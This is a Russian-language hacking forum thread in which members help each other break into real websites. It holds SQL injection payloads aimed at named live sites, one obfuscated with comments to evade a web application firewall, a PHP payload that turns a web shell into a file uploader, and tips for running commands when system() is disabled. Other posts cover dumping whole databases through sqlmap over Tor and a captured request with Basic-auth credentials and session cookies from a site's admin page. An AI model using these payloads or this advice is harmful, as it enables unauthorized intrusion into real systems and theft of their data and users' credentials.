Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Hedorda

    Hedorda New Member

    Joined:
    8 Aug 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А попробуй всё руками сделать... SQLMAP показывает свои запросы.
     
  2. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
    Warning: system() has been disabled for security reasons
    я так понял она выключена в php.ini
    как можно обойти?
     
  3. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    shell_exec(), exec().
     
    karkajoi likes this.
  4. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Быстрее ты задосишь сайт, чем сольешь его такой техникой такой объем данных
     
    _________________________
  5. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    196
    Likes Received:
    342
    Reputations:
    47
    Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.
     
  6. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
     
    _________________________
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
     
    SooLFaa likes this.
  8. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    А вот это очень хорошее и грамотное дополнение...
     
    _________________________
  9. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    #2029 r1l, 20 Aug 2017
    Last edited: 20 Aug 2017
  10. Hedorda

    Hedorda New Member

    Joined:
    8 Aug 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?
     
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Да, Burp suite, ZAP proxy, Charles etc
     
    t0ma5 likes this.
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите вывод сделать, на фильтр не похоже..
    Code:
    https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
     
  13. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    Стоит ограничение на количество символов в переменной, так что крутить получится только как слепую
    Code:
    https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'or mid(database(),1,1)='t';%00
     
  14. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    Пробуй файл записать
    Code:
    cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
    
     
  15. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
    Извините если не в том разделе,
    возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)
    Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.
    На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)
    Направьте на путь истинный, подскажите методы решения.

    Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL
     
    #2035 z0mbie86, 24 Aug 2017
    Last edited: 24 Aug 2017
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhujik%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0Biuytrftgyh%0B*/Select+%20version/*asd*/()+--+
    @BabaDook обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
    Ergebnisse der Volltextsuche zu "5.5.27"
     
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    from фильтрует, пытался скрыть кодировкой,пробелами,коментами, регистром, ни чё не помогает( может у кого то получится...
     
  19. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Ребят кто сможет подсказать с этими двумя урлами
    Ошибка есть
    Но что только не пробовал глухо((
    Code:
    http://www[.]teraxpress[.]com/index.php?route=extension/module/merchant_profile&merchant_id=65
    http://www[.]teraxpress[.]com/index.php?route=extension/module/merchantlogo/getStoreCategory&vpath=3&sort=pd.name&order=ASC&merchant_id=3&limit=25
     
  20. Lesanglier

    Lesanglier Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    3
    всем доброго времени.
    на админке стоит http basic authentication
    читал что можно перехватить login : password в формате base64
    Code:
    GET /administrator/ HTTP/1.1
    Connection: keep-alive
    Cache-Control: max-age=0
    Authorization: Basic NDUzdDo1NHQ=
    Upgrade-Insecure-Requests: 1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: ru,en-US;q=0.8,en;q=0.6
    X-Compress: null
    Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec6140386388055110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776
    Authorization: Basic NDUzdDo1NHQ= < вроде как это и есть логин:пароль или это то что я отправляю, хотя GET возвращяет
    как можно обойти? только брут?